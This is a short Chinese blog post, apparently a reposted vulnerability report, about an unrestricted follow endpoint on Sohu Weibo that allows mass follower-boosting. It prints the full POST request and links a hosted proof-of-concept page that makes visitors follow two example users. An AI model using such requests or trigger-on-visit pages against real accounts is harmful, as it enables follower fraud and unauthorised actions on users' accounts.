搜狐微博任意批量无限制刷粉 – 网站安全 – 自学

时间: 2020-10-10|tag: 67次围观|0 条评论

1、首先存在缺陷的地方是新人激活的那个页面,因为没有保留截图,你们就自己测试吧。   接口我贴出来。   

POST /follow/addfollows HTTP/1.1

Host: t.sohu.com

Proxy-Connection: keep-alive

Content-Length: 353

Accept: application/json, text/javascript, */*; q=0.01

Origin: http://t.sohu.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://t.sohu.com/regist/recommends?interest=zhuanjia,meitu,shishang

Accept-Encoding: gzip,deflate,sdch

Accept-Language: en-US,en;q=0.8,it;q=0.6,ja;q=0.4,zh-TW;q=0.2

Cookie: XXXXXXXXXXXXXXXXXXXXXXX



act=follow&friendids=uids

 

        2、这里没有做任何限制,so,刷粉你们不介意的对吧。   这里我们选取任意两个用户,   http://t.sohu.com/people?uid=998946   http://t.sohu.com/people?uid=549889   ok,直接上图。     搜狐微博任意批量无限制刷粉 – 网站安全 – 自学插图 搜狐微博任意批量无限制刷粉 – 网站安全 – 自学插图1
  3、最后,知道你们时间宝贵,为了方便你们审核,我还搞了个poc,   访问即可触发,关注人还是例子中的两个人。       http://m4sk.sinaapp.com/sohu.php

    上一篇: 随笔记任意文件读取 - 网站安全 - 自学php

    下一篇: discuz!某自带工具,由于使用不当,可以造成web
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《搜狐微博任意批量无限制刷粉 – 网站安全 – 自学
   

还没有人抢沙发呢~